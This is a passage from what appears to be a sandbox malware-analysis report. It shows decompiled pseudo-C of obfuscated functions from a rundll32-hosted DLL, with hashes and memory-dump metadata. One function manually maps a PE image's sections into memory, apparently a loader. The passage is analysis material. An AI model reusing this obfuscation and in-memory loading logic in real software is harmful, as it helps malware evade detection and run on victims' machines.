                                                                        				void* _t232;
                                                                        				intOrPtr* _t234;
                                                                        				signed int* _t236;
                                                                        				signed int* _t237;
                                                                        				signed int* _t238;
                                                                        
                                                                        				_push(_a8);
                                                                        				_t234 = __edx;
                                                                        				_push(0);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t161);
                                                                        				_v16 = 0x1b4e;
                                                                        				_v16 = _v16 ^ 0xc2117ce7;
                                                                        				_v16 = _v16 ^ 0xc21177a9;
                                                                        				_v20 = 0x4ee4;
                                                                        				_t194 = 0x69;
                                                                        				_v20 = _v20 / _t194;
                                                                        				_v20 = _v20 ^ 0x000020c0;
                                                                        				_v28 = 0x719b;
                                                                        				_v28 = _v28 + 0x9810;
                                                                        				_v28 = _v28 ^ 0x00016243;
                                                                        				_v36 = 0xcf79;
                                                                        				_v36 = _v36 << 4;
                                                                        				_v36 = _v36 + 0x818a;
                                                                        				_v36 = _v36 ^ 0x000d705e;
                                                                        				_v40 = 0x5a4d;
                                                                        				_v40 = _v40 + 0x4c3f;
                                                                        				_t195 = 0x28;
                                                                        				_v40 = _v40 * 0x4c;
                                                                        				_v40 = _v40 ^ 0x0031666b;
                                                                        				_v64 = 0x8d9a;
                                                                        				_v64 = _v64 / _t195;
                                                                        				_t196 = 0x5f;
                                                                        				_v64 = _v64 / _t196;
                                                                        				_t197 = 0x63;
                                                                        				_v64 = _v64 * 0x23;
                                                                        				_v64 = _v64 ^ 0x000027a7;
                                                                        				_v12 = 0x746d;
                                                                        				_v12 = _v12 / _t197;
                                                                        				_v12 = _v12 ^ 0x00006093;
                                                                        				_v60 = 0x2db8;
                                                                        				_v60 = _v60 | 0xa376fc52;
                                                                        				_v60 = _v60 >> 8;
                                                                        				_v60 = _v60 ^ 0x00a31548;
                                                                        				_v24 = 0xbe89;
                                                                        				_v24 = _v24 + 0xfffffabc;
                                                                        				_v24 = _v24 ^ 0x0000f7c2;
                                                                        				_v48 = 0x7924;
                                                                        				_v48 = _v48 + 0x8930;
                                                                        				_t198 = 0x7b;
                                                                        				_v48 = _v48 * 0x60;
                                                                        				_v48 = _v48 << 0xb;
                                                                        				_v48 = _v48 ^ 0x06fc5745;
                                                                        				_v52 = 0x6da;
                                                                        				_v52 = _v52 / _t198;
                                                                        				_v52 = _v52 >> 2;
                                                                        				_v52 = _v52 + 0xffffc306;
                                                                        				_v52 = _v52 ^ 0xffffa7a2;
                                                                        				_v32 = 0xa776;
                                                                        				_v32 = _v32 << 0xb;
                                                                        				_v32 = _v32 ^ 0x9264e448;
                                                                        				_v32 = _v32 ^ 0x975f0f13;
                                                                        				_v4 = 0x5f13;
                                                                        				_v4 = _v4 >> 2;
                                                                        				_v4 = _v4 ^ 0x00006c09;
                                                                        				_v8 = 0xd9b4;
                                                                        				_t199 = 0x7d;
                                                                        				_v8 = _v8 / _t199;
                                                                        				_v8 = _v8 ^ 0x00001d23;
                                                                        				_v44 = 0xe400;
                                                                        				_v44 = _v44 | 0xbfff2ffd;
                                                                        				_t200 = 3;
                                                                        				_v44 = _v44 / _t200;
                                                                        				_v44 = _v44 ^ 0x3fffd239;
                                                                        				_v56 = 0xf54;
                                                                        				_v56 = _v56 + 0xffffced3;
                                                                        				_v56 = _v56 + 0x8d94;
                                                                        				_v56 = _v56 ^ 0xc5d6359f;
                                                                        				_v56 = _v56 ^ 0xc5d65e64;
                                                                        				_t180 = E100073F9(_v28, _v36, _v40, _v64, __edx);
                                                                        				_t190 = _t180;
                                                                        				_t236 =  &(( &_v64)[7]);
                                                                        				if(_t190 != 0) {
                                                                        					_t227 = E1000204B(_v56, _v12,  *((intOrPtr*)(_t190 + 0x50)), _v20 | _v16, _v60, _v24);
                                                                        					_t237 =  &(_t236[5]);
                                                                        					if(_t227 == 0) {
                                                                        						L6:
                                                                        						return _t227;
                                                                        					}
                                                                        					E10009970(_v48,  *_t234, _v52, _t227,  *((intOrPtr*)(_t190 + 0x54)), _v32);
                                                                        					_t238 =  &(_t237[4]);
                                                                        					_t232 = ( *(_t190 + 0x14) & 0x0000ffff) + 0x18 + _t190;
                                                                        					_t192 = ( *(_t190 + 6) & 0x0000ffff) * 0x28 + _t232;
                                                                        					while(_t232 < _t192) {
                                                                        						_t188 =  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10));
                                                                        						E10009970(_v4,  *((intOrPtr*)(_t232 + 0x14)) +  *_t234, _v8,  *((intOrPtr*)(_t232 + 0xc)) + _t227,  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10)), _v44);
                                                                        						_t238 =  &(_t238[4]);
                                                                        						_t232 = _t232 + 0x28;
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        				return _t180;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: l$$y$^p$kf1$mt$N
                                                                        • API String ID: 0-2826323611
                                                                        • Opcode ID: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
                                                                        • Instruction ID: b087b2a7bdd9e8b1e5a607b88e6e493accb252ae43d71ee7b54195949d735030
                                                                        • Opcode Fuzzy Hash: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
                                                                        • Instruction Fuzzy Hash: 947124715093409BE358CF65C98991BFBF2FBC4758F008A1DF589862A0D7B6D945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10005856(void* __ecx, void* __edi, void* __eflags) {
                                                                        				char _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				unsigned int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _t207;
                                                                        				signed int _t209;
                                                                        				int _t213;
                                                                        				void* _t216;
                                                                        				signed int _t217;
                                                                        				signed int _t219;
                                                                        				signed int _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t222;
                                                                        				signed int _t223;
                                                                        				signed int _t224;
                                                                        				signed int _t225;
                                                                        				signed int _t226;
                                                                        				signed int _t227;
                                                                        				signed int _t228;
                                                                        				signed int _t233;
                                                                        				void* _t262;
                                                                        				void* _t266;
                                                                        				signed int _t268;
                                                                        
                                                                        				_v20 = 0xe5e9;
                                                                        				_v20 = _v20 >> 1;
                                                                        				_v20 = _v20 ^ 0x000072fc;
                                                                        				_v60 = 0xeee;
                                                                        				_t266 = __ecx;
                                                                        				_t219 = 0xb;
                                                                        				_v60 = _v60 / _t219;
                                                                        				_t220 = 0x2d;
                                                                        				_v60 = _v60 / _t220;
                                                                        				_v60 = _v60 << 0xa;
                                                                        				_v60 = _v60 ^ 0x00001c10;
                                                                        				_v36 = 0x52f6;
                                                                        				_v36 = _v36 ^ 0x4f1b66f5;
                                                                        				_t221 = 0x42;
                                                                        				_v36 = _v36 * 0x69;
                                                                        				_v36 = _v36 ^ 0x72285533;
                                                                        				_v12 = 0x9a21;
                                                                        				_v12 = _v12 | 0x390e9e30;
                                                                        				_v12 = _v12 ^ 0x390e9e21;
                                                                        				_v64 = 0x3c55;
                                                                        				_v64 = _v64 / _t221;
                                                                        				_v64 = _v64 + 0xffff9cac;
                                                                        				_v64 = _v64 << 2;
                                                                        				_v64 = _v64 ^ 0xfffe1a99;
                                                                        				_v44 = 0xe171;
                                                                        				_v44 = _v44 | 0xc7bc5698;
                                                                        				_t222 = 0x66;
                                                                        				_v44 = _v44 / _t222;
                                                                        				_v44 = _v44 ^ 0x01f52ba1;
                                                                        				_v40 = 0x30e3;
                                                                        				_v40 = _v40 ^ 0xbd01c268;
                                                                        				_v40 = _v40 ^ 0x5fce1aa6;
                                                                        				_v40 = _v40 ^ 0xe2cffd7a;
                                                                        				_v24 = 0x83cc;
                                                                        				_t223 = 0x5f;
                                                                        				_v24 = _v24 / _t223;
                                                                        				_v24 = _v24 ^ 0x00004c9a;
                                                                        				_v56 = 0x8dff;
                                                                        				_t224 = 0x7e;
                                                                        				_v56 = _v56 / _t224;
                                                                        				_v56 = _v56 | 0x1e081a33;
                                                                        				_v56 = _v56 >> 0xa;
                                                                        				_v56 = _v56 ^ 0x0007b8c6;
                                                                        				_v16 = 0x76f3;
                                                                        				_t225 = 0x52;
                                                                        				_v16 = _v16 / _t225;
                                                                        				_v16 = _v16 ^ 0x00007e48;
                                                                        				_v48 = 0xd814;
                                                                        				_t226 = 0x1a;
                                                                        				_v48 = _v48 / _t226;
                                                                        				_v48 = _v48 >> 5;
                                                                        				_v48 = _v48 | 0x7e8c2f48;
                                                                        				_v48 = _v48 ^ 0x7e8c1b4f;
                                                                        				_v28 = 0x13ee;
                                                                        				_t227 = 0x75;
                                                                        				_v28 = _v28 / _t227;
                                                                        				_v28 = _v28 + 0xffff1a4e;
                                                                        				_v28 = _v28 ^ 0xffff6e25;
                                                                        				_v8 = 0x2381;
                                                                        				_v8 = _v8 + 0xffff7415;
                                                                        				_v8 = _v8 ^ 0xffffaad1;
                                                                        				_v32 = 0x9c03;
                                                                        				_t228 = 0x2a;
                                                                        				_v32 = _v32 / _t228;
                                                                        				_v32 = _v32 >> 4;
                                                                        				_v32 = _v32 ^ 0x00002dee;
                                                                        				_v52 = 0xdc3f;
                                                                        				_v52 = _v52 >> 0xb;
                                                                        				_v52 = _v52 ^ 0xda865163;
                                                                        				_v52 = _v52 * 0x7a;
                                                                        				_v52 = _v52 ^ 0x2402d330;
                                                                        				_v4 = E10017B6B();
                                                                        				_t216 = _v20 + E10017B6B() % _v60;
                                                                        				_t207 = E10017B6B();
                                                                        				_t209 = _v52;
                                                                        				_t268 = _v36 + _t207 % _v12;
                                                                        				if(_t209 < _t216) {
                                                                        					_t217 = _t216 - _t209;
                                                                        					_t262 = _t266;
                                                                        					_t233 = _t217 >> 1;
                                                                        					_t213 = memset(_t262, 0x2d002d, _t233 << 2);
                                                                        					asm("adc ecx, ecx");
                                                                        					_t266 = _t266 + _t217 * 2;
                                                                        					memset(_t262 + _t233, _t213, 0);
                                                                        				}
                                                                        				E100060DA( &_v4, _v48, 3, _t268, _v28, _v8, _v32, _t266);
                                                                        				 *((short*)(_t266 + _t268 * 2)) = 0;
                                                                        				return 0;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3U(r$H~$U<$q$-$0
                                                                        • API String ID: 0-112106996
                                                                        • Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
                                                                        • Instruction ID: f4907ee1585d44d3942ec58e3a4e8cb82ff1253e3bf876b76615309baba7f8ab
                                                                        • Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
                                                                        • Instruction Fuzzy Hash: 037134716083419FE348CF25D88A50BBBF2FBC8748F10891DF1999A2A0D7B5DA598F46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E10004BDE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                                        				char _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				void* _t127;
                                                                        				intOrPtr _t142;
                                                                        				void* _t145;
                                                                        				void* _t148;
                                                                        				signed int _t164;
                                                                        				signed int _t165;
                                                                        				signed int _t166;
                                                                        				signed int _t167;
                                                                        				void* _t169;
                                                                        				signed int* _t172;
                                                                        
                                                                        				_push(_a20);
                                                                        				_push(1);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(1);
                                                                        				E100056B2(_t127);
                                                                        				_v24 = 0x41a5;
                                                                        				_t172 =  &(( &_v60)[7]);
                                                                        				_v24 = _v24 + 0x21bb;
                                                                        				_v24 = _v24 ^ 0x00007358;
                                                                        				_t169 = 0;
                                                                        				_v28 = 0x71a;
                                                                        				_t148 = 0xfead4ff;
                                                                        				_t164 = 0x12;
                                                                        				_v28 = _v28 * 0x28;
                                                                        				_v28 = _v28 ^ 0x00016495;
                                                                        				_v32 = 0xbf26;
                                                                        				_v32 = _v32 + 0xffff8b18;
                                                                        				_v32 = _v32 ^ 0x000031b7;
                                                                        				_v36 = 0x25da;
                                                                        				_v36 = _v36 ^ 0x27b288f9;
                                                                        				_v36 = _v36 ^ 0x27b2aeec;
                                                                        				_v56 = 0xc86;
                                                                        				_v56 = _v56 * 0x14;
                                                                        				_v56 = _v56 / _t164;
                                                                        				_v56 = _v56 | 0x1dd3be64;
                                                                        				_v56 = _v56 ^ 0x1dd38503;
                                                                        				_v52 = 0xa82;
                                                                        				_t165 = 0x49;
                                                                        				_v52 = _v52 / _t165;
                                                                        				_v52 = _v52 + 0x548f;
                                                                        				_v52 = _v52 ^ 0x000056ef;
                                                                        				_v60 = 0x147a;
                                                                        				_v60 = _v60 + 0xffff5465;
                                                                        				_v60 = _v60 + 0x4912;
                                                                        				_v60 = _v60 + 0x75b6;
                                                                        				_v60 = _v60 ^ 0x00000d5b;
                                                                        				_v12 = 0x2808;
                                                                        				_t166 = 0x3c;
                                                                        				_v12 = _v12 / _t166;
                                                                        				_v12 = _v12 ^ 0x00007e81;
                                                                        				_v16 = 0x677c;
                                                                        				_v16 = _v16 >> 0xf;
                                                                        				_v16 = _v16 ^ 0x00000f03;
                                                                        				_v20 = 0x40ea;
                                                                        				_t73 =  &_v20; // 0x40ea
                                                                        				_t167 = 7;
                                                                        				_v20 =  *_t73 / _t167;
                                                                        				_v20 = _v20 ^ 0x0000696b;
                                                                        				_v8 = 0x2aca;
                                                                        				_v8 = _v8 ^ 0x5bcab796;
                                                                        				_v8 = _v8 ^ 0x5bca9ee4;
                                                                        				_v40 = 0x8019;
                                                                        				_v40 = _v40 >> 1;
                                                                        				_v40 = _v40 << 9;
                                                                        				_v40 = _v40 ^ 0x00802c80;
                                                                        				_v44 = 0xa509;
                                                                        				_v44 = _v44 | 0xfb24deb0;
                                                                        				_v44 = _v44 << 0xa;
                                                                        				_v44 = _v44 ^ 0x93fe8f44;
                                                                        				_v48 = 0x64c2;
                                                                        				_v48 = _v48 + 0xffffc005;
                                                                        				_v48 = _v48 | 0x8cdd04ab;
                                                                        				_v48 = _v48 ^ 0x8cdd37a9;
                                                                        				_t168 = _v4;
                                                                        				while(_t148 != 0x109ed35) {
                                                                        					if(_t148 == 0xfead4ff) {
                                                                        						_t148 = 0x2ad569f8;
                                                                        						continue;
                                                                        					} else {
                                                                        						if(_t148 == 0x1649e19d) {
                                                                        							_t114 =  &_v20; // 0x40ea
                                                                        							E10017A72(_a20, _v56, 1, 1, _v52, _v60, _v12, _t148, _a8, _v16,  *_t114, _v4);
                                                                        							_t172 =  &(_t172[0xa]);
                                                                        							_t148 = 0x109ed35;
                                                                        							_t169 =  !=  ? 1 : _t169;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t148 == 0x2ad569f8) {
                                                                        								_t142 = E10014DBD();
                                                                        								_t168 = _t142;
                                                                        								if(_t142 != 0xffffffff) {
                                                                        									_t148 = 0x2e3949fa;
                                                                        									continue;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t148 != 0x2e3949fa) {
                                                                        									L13:
                                                                        									if(_t148 != 0x14320148) {
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        									_t111 =  &_v28; // 0x40ea
                                                                        									_t145 = E1001D472(_t168,  *_t111, _v32, _v36,  &_v4);
                                                                        									_t172 =  &(_t172[3]);
                                                                        									if(_t145 != 0) {
                                                                        										_t148 = 0x1649e19d;
                                                                        										continue;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t169;
                                                                        				}
                                                                        				E100078F0(_v4, _v8, _v40, _v44, _v48);
                                                                        				_t172 =  &(_t172[3]);
                                                                        				_t148 = 0x14320148;
                                                                        				goto L13;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Xs$[$ki$|g$@<$V
                                                                        • API String ID: 0-1782315456
                                                                        • Opcode ID: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
                                                                        • Instruction ID: d5753dc0bbcc3aea306371c6b81f33b505aaf0871162b6c422c34f7178ca26c7
                                                                        • Opcode Fuzzy Hash: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
                                                                        • Instruction Fuzzy Hash: 2C6155B1509340AFE794CF21C88581FBBF2FBD4798F414A1DF695462A0C775DA098B87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001231B(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				void* _t296;
                                                                        				void* _t321;
                                                                        				intOrPtr _t325;
                                                                        				void* _t327;
                                                                        				short _t328;
                                                                        				void* _t334;
                                                                        				signed int _t338;
                                                                        				signed int _t339;
                                                                        				void* _t341;
                                                                        				intOrPtr* _t377;
                                                                        				signed int _t378;
                                                                        				signed int _t379;
                                                                        				signed int _t380;
                                                                        				signed int _t381;
                                                                        				signed int _t382;
                                                                        				signed int _t383;
                                                                        				signed int _t384;
                                                                        				signed int _t385;
                                                                        				signed int _t386;
                                                                        				signed int _t387;
                                                                        				signed int _t390;
                                                                        				signed int _t391;
                                                                        				signed int _t394;
                                                                        				signed int* _t396;
                                                                        				void* _t398;
                                                                        
                                                                        				_push(_a12);
                                                                        				_t377 = _a4;
                                                                        				_push(_a8);
                                                                        				_push(_t377);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t296);
                                                                        				_v8 = _v8 & 0x00000000;
                                                                        				_t396 =  &(( &_v124)[5]);
                                                                        				_v96 = 0x1023;
                                                                        				_v96 = _v96 ^ 0xe47dc4fc;
                                                                        				_t341 = 0x27600fdb;
                                                                        				_v96 = _v96 ^ 0x32abab6c;
                                                                        				_v96 = _v96 | 0x6d93312b;
                                                                        				_v96 = _v96 ^ 0xffd78252;
                                                                        				_v16 = 0xdaf7;
                                                                        				_t381 = 0x16;
                                                                        				_v16 = _v16 / _t381;
                                                                        				_v16 = _v16 ^ 0x000001c4;
                                                                        				_v20 = 0x6395;
                                                                        				_v20 = _v20 << 0xe;
                                                                        				_v20 = _v20 ^ 0x18e533fd;
                                                                        				_v88 = 0xa972;
                                                                        				_v88 = _v88 | 0xad5f380f;
                                                                        				_t382 = 0x43;
                                                                        				_v88 = _v88 / _t382;
                                                                        				_v88 = _v88 * 0x65;
                                                                        				_v88 = _v88 ^ 0x055ac7b0;
                                                                        				_v44 = 0xf64e;
                                                                        				_v44 = _v44 ^ 0xc329889b;
                                                                        				_v44 = _v44 ^ 0xc3290878;
                                                                        				_v120 = 0x240c;
                                                                        				_v120 = _v120 ^ 0x7b0f575c;
                                                                        				_v120 = _v120 << 0xd;
                                                                        				_v120 = _v120 + 0x9190;
                                                                        				_v120 = _v120 ^ 0xee6af427;
                                                                        				_v68 = 0x2382;
                                                                        				_v68 = _v68 ^ 0xaf4a09f1;
                                                                        				_v68 = _v68 + 0xffff93b5;
                                                                        				_v68 = _v68 ^ 0xaf49ee02;
                                                                        				_v124 = 0xa6c0;
                                                                        				_v124 = _v124 >> 0xc;
                                                                        				_v124 = _v124 << 0xf;
                                                                        				_v124 = _v124 * 0x50;
                                                                        				_v124 = _v124 ^ 0x01900d65;
                                                                        				_v48 = 0x59b;
                                                                        				_v48 = _v48 | 0x1d932e17;
                                                                        				_v48 = _v48 ^ 0x1d93434e;
                                                                        				_v32 = 0x7dc;
                                                                        				_v32 = _v32 | 0x7a0a60f4;
                                                                        				_v32 = _v32 ^ 0x7a0a2147;
                                                                        				_v36 = 0xa0ae;
                                                                        				_v36 = _v36 | 0x35bc5344;
                                                                        				_v36 = _v36 ^ 0x35bce77d;
                                                                        				_v40 = 0xf45a;
                                                                        				_v40 = _v40 >> 5;
                                                                        				_v40 = _v40 ^ 0x00007c19;
                                                                        				_v24 = 0xd9df;
                                                                        				_v24 = _v24 + 0x4204;
                                                                        				_v24 = _v24 ^ 0x00011e54;
                                                                        				_v28 = 0xf9ca;
                                                                        				_v28 = _v28 ^ 0x4b2056fe;
                                                                        				_v28 = _v28 ^ 0x4b20b363;
                                                                        				_v112 = 0xa35c;
                                                                        				_t383 = 7;
                                                                        				_v112 = _v112 / _t383;
                                                                        				_v112 = _v112 >> 8;
                                                                        				_v112 = _v112 ^ 0x00007415;
                                                                        				_v100 = 0x2d35;
                                                                        				_v100 = _v100 | 0x4fbfcbdf;
                                                                        				_v100 = _v100 + 0xffffcb51;
                                                                        				_v100 = _v100 ^ 0x4fbfa459;
                                                                        				_v104 = 0x199f;
                                                                        				_v104 = _v104 | 0xa6a9e361;
                                                                        				_v104 = _v104 ^ 0x0fa1695b;
                                                                        				_t384 = 0x70;
                                                                        				_v104 = _v104 * 0x34;
                                                                        				_v104 = _v104 ^ 0x55bdfdea;
                                                                        				_v108 = 0x6dac;
                                                                        				_v108 = _v108 + 0x7618;
                                                                        				_v108 = _v108 | 0xd437a5be;
                                                                        				_v108 = _v108 >> 5;
                                                                        				_v108 = _v108 ^ 0x06a1e076;
                                                                        				_v52 = 0xb587;
                                                                        				_v52 = _v52 / _t384;
                                                                        				_v52 = _v52 | 0x698df789;
                                                                        				_v52 = _v52 ^ 0x698dbdb0;
                                                                        				_v56 = 0xcc44;
                                                                        				_t385 = 0x54;
                                                                        				_v56 = _v56 / _t385;
                                                                        				_v56 = _v56 + 0xffff840a;
                                                                        				_v56 = _v56 ^ 0xffffb5b3;
                                                                        				_v92 = 0x53df;
                                                                        				_t386 = 0x38;
                                                                        				_v92 = _v92 * 0x2b;
                                                                        				_v92 = _v92 ^ 0x72368f4f;
                                                                        				_v92 = _v92 * 0x5f;
                                                                        				_v92 = _v92 ^ 0x6300adc9;
                                                                        				_v60 = 0xeb4;
                                                                        				_v60 = _v60 ^ 0x82e65f12;
                                                                        				_v60 = _v60 * 0x12;
                                                                        				_v60 = _v60 ^ 0x3431ffe0;
                                                                        				_v76 = 0x9ea1;
                                                                        				_v76 = _v76 / _t386;
                                                                        				_v76 = _v76 << 9;
                                                                        				_v76 = _v76 | 0x56c1a970;
                                                                        				_v76 = _v76 ^ 0x56c5f8a5;
                                                                        				_v80 = 0xe36f;
                                                                        				_t387 = 0x71;
                                                                        				_v80 = _v80 / _t387;
                                                                        				_v80 = _v80 >> 0xa;
                                                                        				_v80 = _v80 >> 0xb;
                                                                        				_v80 = _v80 ^ 0x00002ab6;
                                                                        				_v12 = 0xbe7b;
                                                                        				_v12 = _v12 ^ 0xb73b4484;
                                                                        				_v12 = _v12 ^ 0xb73bd21d;
                                                                        				_v84 = 0x2f05;
                                                                        				_v84 = _v84 ^ 0x486d0961;
                                                                        				_v84 = _v84 * 0x18;
                                                                        				_v84 = _v84 ^ 0xccd4c0a7;
                                                                        				_v84 = _v84 ^ 0x06ef1f50;
                                                                        				_v72 = 0xb051;
                                                                        				_v72 = _v72 | 0x44f81078;
                                                                        				_t394 = _v4;
                                                                        				_t338 = _v4;
                                                                        				_v72 = _v72 * 0x1b;
                                                                        				_v72 = _v72 ^ 0x463a9cc3;
                                                                        				_v116 = 0x904e;
                                                                        				_v116 = _v116 >> 6;
                                                                        				_v116 = _v116 | 0x00eb6e86;
                                                                        				_v116 = _v116 >> 8;
                                                                        				_v116 = _v116 ^ 0x0000eb6e;
                                                                        				_v64 = 0x30db;
                                                                        				_v64 = _v64 + 0xffffb1c5;
                                                                        				_v64 = _v64 ^ 0x9ee5eb39;
                                                                        				_v64 = _v64 ^ 0x611a0999;
                                                                        				while(1) {
                                                                        					_t321 = 0x5942909;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						_t398 = _t341 - 0x19684f4e;
                                                                        						if(_t398 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t398 == 0) {
                                                                        							E100091CD(_v52, _v56, _v92, _t394, _v60);
                                                                        							_t396 =  &(_t396[3]);
                                                                        							_t341 = 0x203b69b2;
                                                                        							while(1) {
                                                                        								_t321 = 0x5942909;
                                                                        								goto L2;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t341 == 0x45bbbee) {
                                                                        								 *(_t377 + 4) = _v64;
                                                                        								_t325 = E1000C6EF(_t377 + 4, _v96, _v100, _v104, _t338 - 1, _t394, _v108);
                                                                        								_t396 =  &(_t396[5]);
                                                                        								 *_t377 = _t325;
                                                                        								_t341 = 0x19684f4e;
                                                                        								while(1) {
                                                                        									_t321 = 0x5942909;
                                                                        									goto L2;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t341 == _t321) {
                                                                        									_t338 = _v116;
                                                                        									_t379 = _v8;
                                                                        									if(_t379 != 0) {
                                                                        										do {
                                                                        											E10015891(_t379 + 0x2c, _t338 * 2 + _t394, _v32, _v36, _v40);
                                                                        											_t327 = E1001BBAB(_v24, _v28, _t379 + 0x2c, _v112);
                                                                        											_t396 =  &(_t396[5]);
                                                                        											_t339 = _t338 + _t327;
                                                                        											_t328 = 0x2c;
                                                                        											 *((short*)(_t394 + _t339 * 2)) = _t328;
                                                                        											_t338 = _t339 + 1;
                                                                        											_t379 =  *((intOrPtr*)(_t379 + 0x1c));
                                                                        										} while (_t379 != 0);
                                                                        										_t321 = 0x5942909;
                                                                        									}
                                                                        									_t391 = _v4;
                                                                        									_t341 = 0x45bbbee;
                                                                        									goto L13;
                                                                        								} else {
                                                                        									if(_t341 == 0xb31c45f) {
                                                                        										_t391 = _v72;
                                                                        										_t380 = _v8;
                                                                        										_v4 = _t391;
                                                                        										if(_t380 != 0) {
                                                                        											do {
                                                                        												_t334 = E1001BBAB(_v44, _v120, _t380 + 0x2c, _v68);
                                                                        												_t380 =  *((intOrPtr*)(_t380 + 0x1c));
                                                                        												_t391 = _t391 + 1 + _t334;
                                                                        											} while (_t380 != 0);
                                                                        											_v4 = _t391;
                                                                        											_t321 = 0x5942909;
                                                                        										}
                                                                        										_t341 = 0xd80ae87;
                                                                        										L13:
                                                                        										_t377 = _a4;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t341 == 0xd80ae87) {
                                                                        											_push(_t341);
                                                                        											_t394 = E100157E8(_t391 + _t391);
                                                                        											_t321 = 0x5942909;
                                                                        											_t341 =  !=  ? 0x5942909 : 0x203b69b2;
                                                                        											continue;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L29:
                                                                        						if(_t341 != 0x178c149f) {
                                                                        							continue;
                                                                        						}
                                                                        						return 0 |  *_t377 != 0x00000000;
                                                                        					}
                                                                        					if(_t341 == 0x203b69b2) {
                                                                        						_t378 = _v8;
                                                                        						if(_t378 != 0) {
                                                                        							do {
                                                                        								_t390 =  *(_t378 + 0x1c);
                                                                        								E100091CD(_v76, _v80, _v12, _t378, _v84);
                                                                        								_t396 =  &(_t396[3]);
